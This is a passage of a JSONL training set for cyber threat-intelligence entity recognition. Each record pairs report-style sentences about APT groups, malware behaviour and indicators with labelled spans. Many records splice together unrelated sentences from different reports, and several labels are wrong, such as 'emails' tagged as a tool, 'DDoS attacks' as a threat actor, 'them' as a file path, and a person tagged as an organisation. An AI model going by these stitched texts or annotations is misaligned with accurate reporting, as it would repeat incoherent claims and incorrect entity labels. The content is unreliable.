We attribute APT38 to North Korean state-sponsored operators based on a combination of technical indicators linking the activity to Pyongyang and details released by DOJ implicating North Korean national Park Jin Hyok in a criminal conspiracy . to MMAT_GLBOPT2 ( most global optimizations completed ) However , twice this year , in March and June , LockBit 's considerable rate of attacks was vastly exceeded by CL0P , which was otherwise dormant .", "spans": {"THREAT_ACTOR: APT38": [[107, 112]], "THREAT_ACTOR: operators": [[145, 154]], "TOOL: MMAT_GLBOPT2": [[342, 354]], "THREAT_ACTOR: LockBit": [[443, 450]], "THREAT_ACTOR: CL0P": [[506, 510]]}, "info": {"id": "cyberner_stix_train_000373", "source": "cyberner_stix_train"}} {"text": "The HawkEye malware is primarily used for credential theft and is often combined with additional tools to extract passwords from email and web browser applications . APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": {"TOOL: HawkEye malware": [[4, 19]], "THREAT_ACTOR: APT28": [[166, 171]], "ORGANIZATION: rockers": [[188, 195]], "ORGANIZATION: dissidents Pussy Riot": [[200, 221]], "TOOL: emails": [[241, 247]]}, "info": {"id": "cyberner_stix_train_000374", "source": "cyberner_stix_train"}} {"text": "In 2011-2012 , the group used a relatively tiny implant ( known as “ Sofacy ” or SOURFACE ) as their first stage malware , which at the time had similarities with the old Miniduke implants .", "spans": {"THREAT_ACTOR: Sofacy": [[69, 75]], "THREAT_ACTOR: SOURFACE": [[81, 89]]}, "info": {"id": "cyberner_stix_train_000375", "source": "cyberner_stix_train"}} {"text": "The identified email owners held a wide range of responsibilities within the Hillary for America campaign , extending from senior figures to junior employees and the group mailboxes for various regional offices .", "spans": {"TOOL: email": [[15, 20]]}, "info": {"id": "cyberner_stix_train_000376", "source": "cyberner_stix_train"}} {"text": 
"1664cb343ee830fa94725fed143b119f7e2351307ed0ce04724b23469b9002f2 Loaded DEX SHA2 : afaf446a337bf93301b1d72855ccdd76112595f6e4369d977bea6f9721edf37e Domain/IP : goldncup [ . Specifically , the targeting of organizations in the aerospace and energy sectors indicates that the APT33 is likely in search of strategic intelligence capable of benefitting a government or military sponsor . Remexi boasts features that allow it to gather keystrokes, take screenshots of Windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote . Since 2021 , there have been multiple leaks of ransomware source code and builders components that are essential to creating and modifying ransomware .", "spans": {"ORGANIZATION: aerospace": [[226, 235]], "ORGANIZATION: energy sectors": [[240, 254]], "THREAT_ACTOR: APT33": [[274, 279]], "ORGANIZATION: government": [[351, 361]], "ORGANIZATION: military": [[365, 373]], "MALWARE: Remexi": [[384, 390]], "SYSTEM: Windows": [[463, 470]], "VULNERABILITY: multiple leaks of ransomware source code": [[619, 659]]}, "info": {"id": "cyberner_stix_train_000377", "source": "cyberner_stix_train"}} {"text": "We have discovered apps using AES , Blowfish , and DES as well as combinations of these to encrypt their strings . More than half of the organizations we have observed being targeted or breached by APT5 operate in these sectors . SC Service control command , implemented as the Windows one . Our initial investigation on the domains registered by Hack520 revealed that similar domains ( listed below ) were registered by another profile .", "spans": {"SYSTEM: Windows": [[278, 285]], "THREAT_ACTOR: Hack520": [[347, 354]]}, "info": {"id": "cyberner_stix_train_000378", "source": "cyberner_stix_train"}} {"text": "By comparing the sizes of the encrypted asset file tong.luo vs the decrypted JAR file mycode.jar , it is interesting to note that it is the same file ( almost the same size ) . 
The timeline shows three main clusters of activity across the three webshells , with activity occurring on two separate webshells (green and orange) within a very small window of time on April 2 , 2019 and the activity involving the third webshell two weeks later on April 16 , 2019 . While Gorgon Group has been making minor changes in their methodologies , they are still actively involved in both targeted and criminal attacks .", "spans": {"THREAT_ACTOR: Gorgon Group": [[468, 480]]}, "info": {"id": "cyberner_stix_train_000379", "source": "cyberner_stix_train"}} {"text": "Due to this obfuscation , a part of the previously mentioned cfg class is now mapped to c/b/a/a/a or c/a/a/a/a . By listing sub-folders , SWAnalytics is able to infer QQ accounts which have never been used on the device . The persistent use of social media to identify and manipulate victims indicates that COBALT GYPSY successfully achieves its objectives using this tactic .", "spans": {"MALWARE: SWAnalytics": [[138, 149]], "ORGANIZATION: social media": [[244, 256]], "THREAT_ACTOR: COBALT GYPSY": [[307, 319]]}, "info": {"id": "cyberner_stix_train_000380", "source": "cyberner_stix_train"}} {"text": "Third-party app stores are ubiquitous in China for a number of reasons including : evermore powerful Chinese Original Equipment Manufacturers ( OEM ) , a lack of an official Chinese Google Play app store , and a growing smartphone market . We didn’t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves . 
While APT1 intruders occasionally use publicly available backdoors such as Poison Ivy and Gh0st RAT .", "spans": {"ORGANIZATION: Chinese Original Equipment Manufacturers ( OEM )": [[101, 149]], "SYSTEM: Google Play": [[182, 193]], "MALWARE: .NET malware": [[291, 303]], "MALWARE: Topinambour": [[324, 335]], "THREAT_ACTOR: APT1": [[355, 359]], "MALWARE: publicly available backdoors": [[387, 415]], "MALWARE: Poison Ivy": [[424, 434]], "MALWARE: Gh0st RAT": [[439, 448]]}, "info": {"id": "cyberner_stix_train_000381", "source": "cyberner_stix_train"}} {"text": "After initialization , the artifact will attempt to establish a connection by creating a socket .", "spans": {}, "info": {"id": "cyberner_stix_train_000382", "source": "cyberner_stix_train"}} {"text": "In red , we see those values being passed into the suspicious Java method through the registered interface . Our primary contribution in this update is to implicate Bahamut in what are likely counterterrorism-motivated surveillance operations , and to further affirm our belief that the group is a hacker-for-hire operation . ZxFunction002 This will either bind the calling process to a port or has the calling process connect to a remote host . Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": {"VULNERABILITY: vulnerabilities are accessible via the internet": [[486, 533]]}, "info": {"id": "cyberner_stix_train_000383", "source": "cyberner_stix_train"}} {"text": "Where possible , minimize server fingerprinting by configuring web servers to avoid responding with banners identifying the server software and version number .", "spans": {"TOOL: web servers": [[63, 74]]}, "info": {"id": "cyberner_stix_train_000384", "source": "cyberner_stix_train"}} {"text": "Both the loader and dropped class are obfuscated using ProGuard , which obfuscates names using alphabet letters . 
This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge . These characteristics suggest that COBALT GYPSY executed the January and February phishing campaigns and that it created the Mia Ash persona .", "spans": {"MALWARE: module": [[119, 125]], "THREAT_ACTOR: COBALT GYPSY": [[294, 306]], "THREAT_ACTOR: Mia Ash": [[384, 391]]}, "info": {"id": "cyberner_stix_train_000385", "source": "cyberner_stix_train"}} {"text": "The purely nominal control over the applications uploaded to these stores means attackers can conceal Trojans in apps made to look like innocent games or utilities . The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center . In this case the legitimate hpqhvind.exe was dropped by the attackers , along with their malicious hpqhvsei.dll , in C:\\Windows\\Temp . KillNet has remained relatively consistent in its targeting of Ukraine ’s supporters and prioritization of DDoS attacks since Russia invaded in February 2022 , and despite new capabilities , the collective has hardly altered its targeting patterns .", "spans": {"THREAT_ACTOR: LuckyMouse": [[272, 282]], "ORGANIZATION: employees": [[376, 385]], "FILEPATH: hpqhvind.exe": [[444, 456]], "FILEPATH: hpqhvsei.dll": [[515, 527]], "THREAT_ACTOR: DDoS attacks": [[658, 670]]}, "info": {"id": "cyberner_stix_train_000386", "source": "cyberner_stix_train"}} {"text": "This local port is used by Exodus Two to execute various commands on the Android device , such as enabling or disabling certain services , or parsing app databases . Suckfly conducted a multistage attack against an e-commerce organization . Corrupted file f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427 . 
imgonline-com-ua-dexifEEdWuIbNSv7G.jpg : The FBI released an advisory warning users about NFT phishing scams where developers are often approached via social media and tricked into visiting a malicious link .", "spans": {"MALWARE: Exodus Two": [[27, 37]], "SYSTEM: Android": [[73, 80]], "ORGANIZATION: e-commerce organization": [[215, 238]], "FILEPATH: f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427": [[256, 320]], "FILEPATH: imgonline-com-ua-dexifEEdWuIbNSv7G.jpg": [[323, 361]], "ORGANIZATION: FBI": [[368, 371]]}, "info": {"id": "cyberner_stix_train_000387", "source": "cyberner_stix_train"}} {"text": "While the attackers used different pretexts when sending these malicious emails , two methodologies stood out .", "spans": {"TOOL: emails": [[73, 79]]}, "info": {"id": "cyberner_stix_train_000388", "source": "cyberner_stix_train"}} {"text": "If that doesn ’ t work , they try to use queryUsageStats : When the malware invokes queryUsageStats , it asks for the list of applications that ran in the last 1 million milliseconds ( 16 minutes and 40 seconds ) . In this campaign , the Group123 used a classical HWP document in order to download and execute a previously unknown malware : NavRAT . 
control flow flattening , COSMICENERGY lacks discovery capabilities , which implies that to successfully execute an attack the malware operator would need to perform some internal reconnaissance to obtain environment information , such as MSSQL server IP addresses , MSSQL credentials , and target IEC-104 device IP addresses .", "spans": {"THREAT_ACTOR: Group123": [[238, 246]], "TOOL: HWP document": [[264, 276]], "TOOL: NavRAT": [[341, 347]], "MALWARE: COSMICENERGY": [[376, 388]], "THREAT_ACTOR: malware operator": [[477, 493]]}, "info": {"id": "cyberner_stix_train_000389", "source": "cyberner_stix_train"}} {"text": "Suckfly : Revealing the secret life of your code signing certificates .", "spans": {"THREAT_ACTOR: Suckfly": [[0, 7]]}, "info": {"id": "cyberner_stix_train_000390", "source": "cyberner_stix_train"}} {"text": "They exist in two types : the credentials stealers ( first 2 screenshots ) and the credit card grabbers ( last screenshot ) . But after 2019 SectorJ04 has changed its hacking strategy to attack using spam email . BRONZE BUTLER are also fluent in Japanese , crafting phishing emails in native Japanese and operating successfully within a Japanese-language environment .", "spans": {"THREAT_ACTOR: SectorJ04": [[141, 150]], "THREAT_ACTOR: BRONZE BUTLER": [[213, 226]], "TOOL: emails": [[275, 281]]}, "info": {"id": "cyberner_stix_train_000391", "source": "cyberner_stix_train"}} {"text": "One such immediately apparent connection was the similar deployment technique used by both XLoader 6.0 and FakeSpy . These URIs result in the download of an installer , which creates a PE of the malware typically known as HTTPBrowser , but called Token Control by the Wekby group themselves ( based upon the PDB strings found within many of the samples ) . If performing receive operations in ping mode, Glimpse makes a query with the 0 action to contact the controller for . 
Adversaries may utilize command - line interfaces ( CLIs ) to interact with systems and execute commands .", "spans": {"MALWARE: XLoader 6.0": [[91, 102]], "MALWARE: FakeSpy": [[107, 114]], "TOOL: HTTPBrowser": [[222, 233]], "TOOL: Token Control": [[247, 260]], "THREAT_ACTOR: Wekby group": [[268, 279]], "MALWARE: Glimpse": [[404, 411]]}, "info": {"id": "cyberner_stix_train_000392", "source": "cyberner_stix_train"}} {"text": "The sample we analyzed changed that behavior and hard-coded DWORD for each object type .", "spans": {}, "info": {"id": "cyberner_stix_train_000393", "source": "cyberner_stix_train"}} {"text": "When a user enters an Internet banking site on a computer infected by banking malware ( ZeuS , Citadel ) , a request about the smartphone number and type of operating system is injected into the code of the authentication page . Kaspersky Lab documented this behavior in 2014 . Since ZxShell has been around since at least 2004 , numerous people have purchased or obtained the tools necessary to set up ZxShell command and control servers ( C&C ) and generate the malware that is placed on the victim ’s network . 
The RAT was likely not detected before as it has the ability to remove itself from the victim machine in time for the deployment of malware .", "spans": {"MALWARE: ZeuS": [[88, 92]], "MALWARE: Citadel": [[95, 102]], "ORGANIZATION: Kaspersky Lab": [[229, 242]], "MALWARE: ZxShell": [[284, 291], [403, 410]], "TOOL: command and control": [[411, 430]], "TOOL: C&C": [[441, 444]]}, "info": {"id": "cyberner_stix_train_000394", "source": "cyberner_stix_train"}} {"text": "The root stash directory location may be read from the configuration file or set to the default location which is “ %MYPICTURES% ” .", "spans": {}, "info": {"id": "cyberner_stix_train_000395", "source": "cyberner_stix_train"}} {"text": "Downeks .NET internal name is “ SharpDownloader ” , “ Sharp ” may be a reference to the language it was written in – C# .", "spans": {"MALWARE: Downeks": [[0, 7]], "MALWARE: SharpDownloader": [[32, 47]], "TOOL: C#": [[117, 119]]}, "info": {"id": "cyberner_stix_train_000396", "source": "cyberner_stix_train"}} {"text": "The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less” aspect of this method . The Plead malware is a backdoor which , according to Trend Micro , is used by the BlackTech group in targeted attacks .", "spans": {"MALWARE: GRIFFON": [[8, 15]], "MALWARE: Plead": [[129, 134]], "MALWARE: malware": [[135, 142]], "MALWARE: backdoor": [[148, 156]], "ORGANIZATION: Trend Micro": [[178, 189]]}, "info": {"id": "cyberner_stix_train_000397", "source": "cyberner_stix_train"}} {"text": "The code itself is not modified by this type of obfuscation though , making the analysis easier . It turns out that contacts data isn’t the only unusual data SWAnalytics is interested in . 
CTU researchers have observed multiple COBALT GYPSY campaigns since 2015 and consider it highly likely that the group is associated with Iranian government-directed cyber operations .", "spans": {"MALWARE: SWAnalytics": [[158, 169]], "ORGANIZATION: CTU": [[189, 192]]}, "info": {"id": "cyberner_stix_train_000398", "source": "cyberner_stix_train"}} {"text": "CTU researchers have evidence that the threat group compromised U.S. and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_000399", "source": "cyberner_stix_train"}} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . In addition , the time stamp on the CA is new , which might mean that it was obtained specifically for this attack .", "spans": {"MALWARE: files": [[4, 9]], "VULNERABILITY: Microsoft Office vulnerability": [[33, 63]], "VULNERABILITY: CVE-2012-0158": [[66, 79]], "ORGANIZATION: CA": [[195, 197]]}, "info": {"id": "cyberner_stix_train_000400", "source": "cyberner_stix_train"}} {"text": "We now track this activity set as TEMP.Veles .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[34, 44]]}, "info": {"id": "cyberner_stix_train_000401", "source": "cyberner_stix_train"}} {"text": "As more variants of Mirai emerged , so did the list IoT devices it was targeting .", "spans": {"TOOL: Mirai": [[20, 25]], "TOOL: IoT": [[52, 55]]}, "info": {"id": "cyberner_stix_train_000402", "source": "cyberner_stix_train"}} {"text": "Various recruitment posts on Chinese job sites and Chinese National Enterprise Credit Information Public System ( NECIPS ) data led us one step further , linking the actor to its legal entity name 
. As of the Group-IB investigation of this malware program in March 2015 , Corkow v.7.118.1.1 had not been detected by a single antivirus program . They also sell credentials from the affected systems , allowing other cybercriminals to have remote access to hotel front desks infected by the campaign . While CISA or Microsoft have yet to disclose any specific vulnerabilities the actors exploited , the CISA report does say that the APT used a Microsoft account consumer key to forge tokens and impersonate targeted users .", "spans": {"SYSTEM: Chinese National Enterprise Credit Information Public System ( NECIPS )": [[51, 122]], "ORGANIZATION: Group-IB": [[209, 217]], "TOOL: Corkow": [[272, 278]], "ORGANIZATION: CISA": [[506, 510]], "ORGANIZATION: Microsoft": [[514, 523]], "ORGANIZATION: CISA report": [[601, 612]]}, "info": {"id": "cyberner_stix_train_000403", "source": "cyberner_stix_train"}} {"text": "When a Germany-based industrial conglomerate disclosed in December 2016 that it was breached early that year , the breach was revealed to be a professionally run industrial espionage attack .", "spans": {"ORGANIZATION: industrial conglomerate": [[21, 44]]}, "info": {"id": "cyberner_stix_train_000404", "source": "cyberner_stix_train"}} {"text": "The overall infection procedure was very similar to the WFCWallet case , but with an added injection procedure , and they only used the final backdoor payload instead of using a tunneling tool .", "spans": {"TOOL: WFCWallet": [[56, 65]]}, "info": {"id": "cyberner_stix_train_000405", "source": "cyberner_stix_train"}} {"text": "Our decompilation of the serialization library was not complete enough to allow simple recompilation .", "spans": {"TOOL: serialization library": [[25, 46]]}, "info": {"id": "cyberner_stix_train_000406", "source": "cyberner_stix_train"}} {"text": "Broadcast Receiver Figure 4 : MyReceiver broadcast receiver . It was reported by Symantec to Microsoft in September 2018 and was patched on March 12 , 2019 . 
Carbanak : Anunak , Carbon Spider .", "spans": {"ORGANIZATION: Symantec": [[81, 89]], "THREAT_ACTOR: Carbanak": [[158, 166]], "THREAT_ACTOR: Anunak": [[169, 175]], "THREAT_ACTOR: Carbon Spider": [[178, 191]]}, "info": {"id": "cyberner_stix_train_000407", "source": "cyberner_stix_train"}} {"text": "Operation AppleJeus Sequel , Lazarus continues to attack the cryptocurrency business with enhanced capabilities .", "spans": {"THREAT_ACTOR: Lazarus": [[29, 36]]}, "info": {"id": "cyberner_stix_train_000408", "source": "cyberner_stix_train"}} {"text": "In the image below , we see the malware function that detects such dialogs when they are presented to the user , asking them to tap an option based on predefined choices . These actors scan websites for vulnerabilities to exploit to illicitly access databases . This technique was observed in previous Clayslide documents to access the script variant of the Helminth Trojan in earlier OilRig attacks .", "spans": {"THREAT_ACTOR: actors": [[178, 184]], "MALWARE: Clayslide documents": [[302, 321]]}, "info": {"id": "cyberner_stix_train_000409", "source": "cyberner_stix_train"}} {"text": "This IP is located in Los Angeles , U.S.A. , at a hosting company named “ Emagine Concept Inc ” . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . PROMETHIUM uses a unique set of tools and methods to perform actions like lateral movement and data Exfiltration .", "spans": {"ORGANIZATION: Emagine Concept Inc": [[74, 93]], "MALWARE: documents": [[102, 111]], "VULNERABILITY: CVE-2012-0158": [[195, 208]], "VULNERABILITY: Microsoft Word vulnerabilities": [[264, 294]], "THREAT_ACTOR: PROMETHIUM": [[339, 349]]}, "info": {"id": "cyberner_stix_train_000410", "source": "cyberner_stix_train"}} {"text": "The group was first publicly disclosed by FireEye in this report . 
The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection .", "spans": {"ORGANIZATION: FireEye": [[42, 49]], "VULNERABILITY: CVE-2012-0158": [[90, 103]]}, "info": {"id": "cyberner_stix_train_000411", "source": "cyberner_stix_train"}} {"text": "They ’re a critical component of many dangerous industrial environments such as electric power generation and oil and gas processing .", "spans": {}, "info": {"id": "cyberner_stix_train_000412", "source": "cyberner_stix_train"}} {"text": "Dragos has reported that XENOTIME , the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017 , has expanded its focus beyond the oil and gas industries . To install and register the malicious shim database on a system , FIN7 used a custom Base64 encoded PowerShell script , which ran the sdbinst.exe” utility to register a custom shim database file containing a patch onto a system .", "spans": {"ORGANIZATION: Dragos": [[0, 6]], "THREAT_ACTOR: XENOTIME": [[25, 33]], "THREAT_ACTOR: TRISIS": [[61, 67]], "ORGANIZATION: oil": [[186, 189]], "ORGANIZATION: gas industries": [[194, 208]], "THREAT_ACTOR: FIN7": [[277, 281]], "MALWARE: PowerShell script": [[311, 328]], "FILEPATH: sdbinst.exe”": [[345, 357]]}, "info": {"id": "cyberner_stix_train_000413", "source": "cyberner_stix_train"}} {"text": "Within the unit , two divisions were involved in the breaches : one specializing in operations and the second in development and maintenance of hacking tools and infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_train_000414", "source": "cyberner_stix_train"}} {"text": "We discovered the activity originated from three separate IP addresses , all located in Chengdu , China .", "spans": {}, "info": {"id": "cyberner_stix_train_000415", "source": "cyberner_stix_train"}} {"text": "The package certificate is issued under the package name , which also resembles the name of the main DLL name . 
They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe . APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea .", "spans": {"MALWARE: Mimikatz Lite": [[237, 250]], "MALWARE: GetPassword.exe": [[254, 269]], "THREAT_ACTOR: APT37": [[272, 277]]}, "info": {"id": "cyberner_stix_train_000416", "source": "cyberner_stix_train"}} {"text": "This same keyword was also found in the njRAT c2 communication used in this attack .", "spans": {"MALWARE: njRAT": [[40, 45]], "TOOL: c2": [[46, 48]]}, "info": {"id": "cyberner_stix_train_000417", "source": "cyberner_stix_train"}} {"text": "The BRONZE PRESIDENT cyberespionage group targets NGOs , as well as political and law enforcement organizations in countries in South and East Asia .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[4, 20]]}, "info": {"id": "cyberner_stix_train_000418", "source": "cyberner_stix_train"}} {"text": "Understanding the “ how ” and “ why ” behind different entity classifications of similar ( or even the same ) activity allows us to move beyond the dismissive approach of “ everyone has their names for marketing purposes ” to a more productive mindset that grasps the fundamental methodologies that ( should ) drive these decisions .", "spans": {}, "info": {"id": "cyberner_stix_train_000419", "source": "cyberner_stix_train"}} {"text": "The sample analyzed was targeted at Russian-speaking users , as most of the user interaction pages are written in Russian . This focus on training aligns with LYCEUM’s targeting of executives , HR staff , and IT personnel . 
As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions to raise money for the North Korean regime .", "spans": {"THREAT_ACTOR: LYCEUM’s": [[159, 167]], "ORGANIZATION: executives": [[181, 191]], "ORGANIZATION: HR staff": [[194, 202]], "ORGANIZATION: IT personnel": [[209, 221]], "THREAT_ACTOR: APT38": [[286, 291]], "ORGANIZATION: financial institutions": [[327, 349]]}, "info": {"id": "cyberner_stix_train_000420", "source": "cyberner_stix_train"}} {"text": ", included the kasper PDB string reported by Unit 42 , and used similar POST and GET requests .", "spans": {"ORGANIZATION: Unit 42": [[45, 52]]}, "info": {"id": "cyberner_stix_train_000421", "source": "cyberner_stix_train"}} {"text": "In their current campaign , APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros . This could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists .", "spans": {"THREAT_ACTOR: APT32": [[28, 33]], "MALWARE: ActiveMime files": [[48, 64]], "ORGANIZATION: diplomats": [[167, 176]], "ORGANIZATION: journalists": [[272, 283]]}, "info": {"id": "cyberner_stix_train_000422", "source": "cyberner_stix_train"}} {"text": "Based on Suckfly scanning for common ports , it ’s clear that the group was looking to expand its foothold on the e-commerce company 's internal network .", "spans": {"THREAT_ACTOR: Suckfly": [[9, 16]]}, "info": {"id": "cyberner_stix_train_000423", "source": "cyberner_stix_train"}} {"text": "Project Spy ’ s earlier versions Searching for the domain in our sample database , we found that the coronavirus update app appears to be the latest version of another sample that we detected in May 2019 . 
Periodically , researchers at Palo Alto Networks hunt through WildFire execution reports , using AutoFocus , to identify untagged samples ' artifacts in the hopes of identifying previously undiscovered malware families , behaviors , and campaigns . The code tracks the block comparison variable in each predecessor and more ( if any conditional blocks before the predecessor ) When the marital infidelity website AshleyMadison.com learned in July 2015 that hackers were threatening to publish data stolen from 37 million users , the company ’s then - CEO Noel Biderman was quick to point the finger at an unnamed former contractor .", "spans": {"MALWARE: Project Spy": [[0, 11]], "ORGANIZATION: Palo Alto Networks": [[236, 254]], "ORGANIZATION: WildFire": [[268, 276]], "ORGANIZATION: AshleyMadison.com": [[619, 636]], "ORGANIZATION: Noel Biderman": [[761, 774]], "ORGANIZATION: unnamed former contractor": [[811, 836]]}, "info": {"id": "cyberner_stix_train_000424", "source": "cyberner_stix_train"}} {"text": "The loader ’ s anti-debugger code is based on the following three methods : The first call aims to destroy the debugger connection : NOTE : This call completely stops the execution of WinDbg and other debuggers The second call tries to detect the presence of a debugger : The final call tries to destroy the possibility of adding software breakpoint : Finally , if the loader is happy with all the checks done so far , based on the victim operating system ( 32 or 64-bit ) it proceeds to decrypt a set of fake bitmap resources ( stage 2 We believe recent activity targeting private interests in Vietnam suggests that APT32 poses a threat to companies doing business or preparing to invest in the country . The payload is encoded inside this image with the use of a technique called steganography , which utilizes the least significant bits of each pixel’s color code to store hidden information , without making overtly visible changes to the picture itself . 
The actor hunts for confidential information stored in the networks of governmental organizations , political groups and think tanks , as well as various individuals involved in defense and geopolitical related research .", "spans": {"THREAT_ACTOR: APT32": [[617, 622]], "ORGANIZATION: governmental organizations": [[1031, 1057]], "ORGANIZATION: political groups": [[1060, 1076]], "ORGANIZATION: think tanks": [[1081, 1092]], "ORGANIZATION: various individuals involved in defense and geopolitical related research": [[1106, 1179]]}, "info": {"id": "cyberner_stix_train_000425", "source": "cyberner_stix_train"}} {"text": "The fake applications are built using WebView , a popular extension of Android ’ s View class that lets the developer show a webpage . The zip contained a sample of the Poison Ivy malware which is also known to be used by APT10 . APT38 's increasingly aggressive targeting against banks .", "spans": {"SYSTEM: WebView": [[38, 45]], "SYSTEM: Android": [[71, 78]], "TOOL: Poison Ivy": [[169, 179]], "THREAT_ACTOR: APT10": [[222, 227]], "THREAT_ACTOR: APT38": [[230, 235]], "ORGANIZATION: banks": [[281, 286]]}, "info": {"id": "cyberner_stix_train_000426", "source": "cyberner_stix_train"}} {"text": "Unlike CosmicDuke and PinchDuke , GeminiDuke primarily collects information on the victim computer ’s configuration .", "spans": {"MALWARE: CosmicDuke": [[7, 17]], "MALWARE: PinchDuke": [[22, 31]], "MALWARE: GeminiDuke": [[34, 44]]}, "info": {"id": "cyberner_stix_train_000427", "source": "cyberner_stix_train"}} {"text": "The actors likely log into sahro.bella7@post.cz and process the system information and screenshot sent by the Trojan to determine if the compromised host is of interest .", "spans": {"EMAIL: sahro.bella7@post.cz": [[27, 47]], "MALWARE: Trojan": [[110, 116]]}, "info": {"id": "cyberner_stix_train_000428", "source": "cyberner_stix_train"}} {"text": "'' There are 27 response codes that the C2 can use to make requests to the trojan , which pretty much 
match what 's listed in the capabilities section . CTU research indicates that LYCEUM may have been active as early as April 2018 . Over time these malware similarities diverged , as did targeting , intended outcomes , and TTPs , almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship .", "spans": {"ORGANIZATION: CTU": [[153, 156]], "THREAT_ACTOR: LYCEUM": [[181, 187]], "THREAT_ACTOR: operational groups": [[409, 427]]}, "info": {"id": "cyberner_stix_train_000429", "source": "cyberner_stix_train"}} {"text": "They did this at least 5 times between 18 April and 15 May . LAZARUS GROUP is responsible for attacks ranging from the 2014 attack on Sony Pictures to a number of Bitcoin heists in 2017 . The backdoor installed in the machine is more customized than that used by RevengeHotels : it ’s developed from scratch and is able to collect data from the clipboard and printer spooler , and capture screenshots . 
Methods of manipulating control can include changes to set point values , tags , or other parameters .", "spans": {"ORGANIZATION: Sony Pictures": [[134, 147]], "MALWARE: backdoor": [[192, 200]], "THREAT_ACTOR: RevengeHotels": [[263, 276]]}, "info": {"id": "cyberner_stix_train_000430", "source": "cyberner_stix_train"}} {"text": "If the account exists , HammerDuke will then search for tweets from that account with links to image files that contain embedded commands for the toolset to execute .", "spans": {"MALWARE: HammerDuke": [[24, 34]]}, "info": {"id": "cyberner_stix_train_000431", "source": "cyberner_stix_train"}} {"text": "start rundll32.exe “ C:\\Users\\user\\AppData\\Local\\cdnver.dll ” .", "spans": {"FILEPATH: rundll32.exe": [[6, 18]], "FILEPATH: C:\\Users\\user\\AppData\\Local\\cdnver.dll": [[21, 59]]}, "info": {"id": "cyberner_stix_train_000432", "source": "cyberner_stix_train"}} {"text": "On Windows 10 , similar code integrity policies can be configured using Windows Defender Application Control . ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints . OceanLotus : {B578B063-93FB-4A5F-82B4-4E6C5EBD393B} ? 4 0 ( config+0x486 ) . 
The second path ( /Library / Fonts / ArialUnicode.ttf.md5.1 ) may be used to store logging information related to monitor activity that is described as follows .", "spans": {"SYSTEM: Windows 10": [[3, 13]], "SYSTEM: Windows Defender Application Control": [[72, 108]], "MALWARE: ChopShop1": [[111, 120]], "ORGANIZATION: MITRE Corporation": [[157, 174]], "THREAT_ACTOR: OceanLotus": [[326, 336]]}, "info": {"id": "cyberner_stix_train_000433", "source": "cyberner_stix_train"}} {"text": "We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests . We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations .", "spans": {"FILEPATH: them": [[226, 230]]}, "info": {"id": "cyberner_stix_train_000434", "source": "cyberner_stix_train"}} {"text": "Original code of the APK on the left , versus injected APK on the right The analysis of the APK was rather interesting , because some of the actions were very common spyware features , such as the exfiltration of SMS messages , call logs and other data . The targets are military or defense industry in particular countries , it used DDNS for C2 servers , and tracked connections from their victims by using target or campaign codes , as well as disguising the malware as document file , and using a dropper to install the malware and decoy file . 
The malware creates 11 threads simultaneously : six threads are responsible for stealing information from the infected host , and five threads are for forwarding collected data to four cloud services ( Box , Dropbox , Pcloud and Yandex ) .", "spans": {"TOOL: dropper": [[500, 507]], "TOOL: Box": [[750, 753]], "TOOL: Dropbox": [[756, 763]], "TOOL: Pcloud": [[766, 772]], "TOOL: Yandex": [[777, 783]]}, "info": {"id": "cyberner_stix_train_000435", "source": "cyberner_stix_train"}} {"text": "UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques . The use of InPage as an attack vector is not commonly seen , with the only previously noted attacks being documented by Kaspersky in late 2016 .", "spans": {"MALWARE: UMBRAGE": [[0, 7]], "MALWARE: InPage": [[205, 211]], "ORGANIZATION: Kaspersky": [[314, 323]]}, "info": {"id": "cyberner_stix_train_000436", "source": "cyberner_stix_train"}} {"text": "The change in the way the malware works today may be to help finance the campaign through fraudulent ad activity . APT39 's focus on the widespread theft of personal information sets it apart from other Iranian groups FireEye tracks , which have been linked to influence operations , disruptive attacks , and other threats . In this case , If this is the primary reason why someone might be after your companys data , simple preventative measures could be used to deter these attacks from happening .", "spans": {"THREAT_ACTOR: APT39": [[115, 120]], "THREAT_ACTOR: groups": [[211, 217]], "ORGANIZATION: FireEye": [[218, 225]]}, "info": {"id": "cyberner_stix_train_000437", "source": "cyberner_stix_train"}} {"text": "This variant of HenBox also used the common green Android figure as the app logo and was named 设置 ( “ Backup ” in English ) . 
